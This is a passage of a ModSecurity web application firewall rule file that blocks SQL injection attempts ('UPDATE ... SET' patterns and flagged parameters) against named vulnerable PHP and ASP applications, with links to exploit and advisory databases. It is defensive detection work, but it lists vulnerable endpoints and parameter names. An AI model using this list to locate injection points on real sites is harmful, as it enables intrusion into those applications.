"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004747,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Nabopoll SQL Injection Attempt -- result.php surv UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3355/'" SecRule &TX:'/SQL_INJECTION.*ARGS:surv/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nabopoll SQL Injection Attempt -- result.php surv UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006885) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- users.php id UPDATE SecRule REQUEST_LINE "@contains /users.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006885,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- users.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21227'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- users.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006741) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- ipsearch.admin.php UPDATE SecRule REQUEST_LINE "@contains /plugins/ipsearch/ipsearch.admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006741,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- ipsearch.admin.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23180'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- ipsearch.admin.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006747) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- pfs.edit.inc.php UPDATE SecRule REQUEST_LINE "@contains /pfs/pfs.edit.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006747,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- pfs.edit.inc.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23180'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- pfs.edit.inc.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006753) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.register.inc.php UPDATE SecRule REQUEST_LINE "@contains /system/core/users/users.register.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006753,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.register.inc.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23180'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.register.inc.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006759) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- polls.php id UPDATE SecRule REQUEST_LINE "@contains /polls.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006759,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- polls.php id UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23180'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- polls.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007293) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.php id UPDATE SecRule REQUEST_LINE "@contains /users.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007293,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452269/100/100/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006552) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NetClassifieds Premium Edition SQL Injection Attempt -- ViewCat.php s_user_id UPDATE SecRule REQUEST_LINE "@contains /ViewCat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006552,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS NetClassifieds Premium Edition SQL Injection Attempt -- ViewCat.php s_user_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24584'" SecRule &TX:'/SQL_INJECTION.*ARGS:s_user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NetClassifieds Premium Edition SQL Injection Attempt -- ViewCat.php s_user_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004163) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NetVIOS Portal SQL Injection Attempt -- page.asp NewsID UPDATE SecRule REQUEST_LINE "@contains /News/page.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004163,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS NetVIOS Portal SQL Injection Attempt -- page.asp NewsID UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3520/'" SecRule &TX:'/SQL_INJECTION.*ARGS:NewsID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NetVIOS Portal SQL Injection Attempt -- page.asp NewsID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004941) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentname UPDATE SecRule REQUEST_LINE "@contains /pages/addcomment2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004941,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentname UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/19703'" SecRule &TX:'/SQL_INJECTION.*ARGS:commentname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentmail UPDATE SecRule REQUEST_LINE "@contains /pages/addcomment2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004948,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentmail UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/19703'" SecRule &TX:'/SQL_INJECTION.*ARGS:commentmail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentmail UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004954) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentwebsite UPDATE SecRule REQUEST_LINE "@contains /pages/addcomment2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004954,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentwebsite UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/19703'" SecRule &TX:'/SQL_INJECTION.*ARGS:commentwebsite/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentwebsite UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004960) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php comment UPDATE SecRule REQUEST_LINE "@contains /pages/addcomment2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004960,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php comment UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/19703'" SecRule &TX:'/SQL_INJECTION.*ARGS:comment/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php comment UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005680) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nicola Asuni All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_functions_downloads.php download_category UPDATE SecRule REQUEST_LINE "@contains /shared/code/cp_functions_downloads.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005680,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Nicola Asuni All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_functions_downloads.php download_category UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23726'" SecRule &TX:'/SQL_INJECTION.*ARGS:download_category/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nicola Asuni All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_functions_downloads.php download_category UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005020) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Noname Media Photo Galerie Standard SQL Injection Attempt -- view.php id UPDATE SecRule REQUEST_LINE "@contains /view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005020,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Noname Media Photo Galerie Standard SQL Injection Attempt -- view.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3261'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Noname Media Photo Galerie Standard SQL Injection Attempt -- view.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006596) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp agentid UPDATE SecRule REQUEST_LINE "@contains /dagent/downloadreport.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006596,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp agentid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21473'" SecRule &TX:'/SQL_INJECTION.*ARGS:agentid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp agentid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006602) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp pass UPDATE SecRule REQUEST_LINE "@contains /dagent/downloadreport.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006602,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp pass UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21473'" SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004312) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE SecRule REQUEST_LINE "@contains /nukesentinel.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004312,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/462453/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004735) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE SecRule REQUEST_LINE "@contains /nukesentinel.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004735,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3338'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004741) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nsbypass.php UPDATE SecRule REQUEST_LINE "@contains /includes/nsbypass.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004741,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nsbypass.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3337'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nsbypass.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006812) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Oxygen (O2PHP Bulletin Board) SQL Injection Attempt -- viewthread.php pid UPDATE SecRule REQUEST_LINE "@contains /viewthread.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006812,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Oxygen (O2PHP Bulletin Board) SQL Injection Attempt -- viewthread.php pid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21172'" SecRule &TX:'/SQL_INJECTION.*ARGS:pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Oxygen (O2PHP Bulletin Board) SQL Injection Attempt -- viewthread.php pid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OSSIM repository_attachment.php UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /ossim/repository/repository_attachment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010656,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS OSSIM repository_attachment.php UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10479'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id_document/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OSSIM repository_attachment.php UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005602) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Okul Web Otomasyon Sistemi SQL Injection Attempt -- etkinlikbak.asp id UPDATE SecRule REQUEST_LINE "@contains /etkinlikbak.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005602,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Okul Web Otomasyon Sistemi SQL Injection Attempt -- etkinlikbak.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3135'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Okul Web Otomasyon Sistemi SQL Injection Attempt -- etkinlikbak.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004455) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Omegasoft SQL Injection Attempt -- OmegaMw7.asp UPDATE SecRule REQUEST_LINE "@contains /OmegaMw7.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004455,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Omegasoft SQL Injection Attempt -- OmegaMw7.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/2.2.8'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Omegasoft SQL Injection Attempt -- OmegaMw7.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004850) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Online Web Building SQL Injection Attempt -- page.asp art_id UPDATE SecRule REQUEST_LINE "@contains /user_pages/page.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004850,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Online Web Building SQL Injection Attempt -- page.asp art_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3339'" SecRule &TX:'/SQL_INJECTION.*ARGS:art_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Online Web Building SQL Injection Attempt -- page.asp art_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011061) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Oracle E-Business Suite Financials jtfwcpnt.jsp UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /jtfwcpnt.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011061,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Oracle E-Business Suite Financials jtfwcpnt.jsp UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,39510'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:query/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Oracle E-Business Suite Financials jtfwcpnt.jsp UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- register.asp UserUpdate UPDATE SecRule REQUEST_LINE "@contains /login/register.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005942,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- register.asp UserUpdate UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21822'" SecRule &TX:'/SQL_INJECTION.*ARGS:UserUpdate/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- register.asp UserUpdate UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- a_register.asp UPDATE SecRule REQUEST_LINE "@contains /includes/a_register.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005948,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- a_register.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21822'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- a_register.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004246) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Stats SQL Injection Attempt -- php-stats.recphp.php ip UPDATE SecRule REQUEST_LINE "@contains /php-stats.recphp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004246,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Stats SQL Injection Attempt -- php-stats.recphp.php ip UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3497'" SecRule &TX:'/SQL_INJECTION.*ARGS:ip/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Stats SQL Injection Attempt -- php-stats.recphp.php ip UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006515) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_Type_ID UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006515,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_Type_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'" SecRule &TX:'/SQL_INJECTION.*ARGS:Outgoing_Type_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_Type_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006521) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_ID UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006521,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'" SecRule &TX:'/SQL_INJECTION.*ARGS:Outgoing_ID/' "@gt 0" 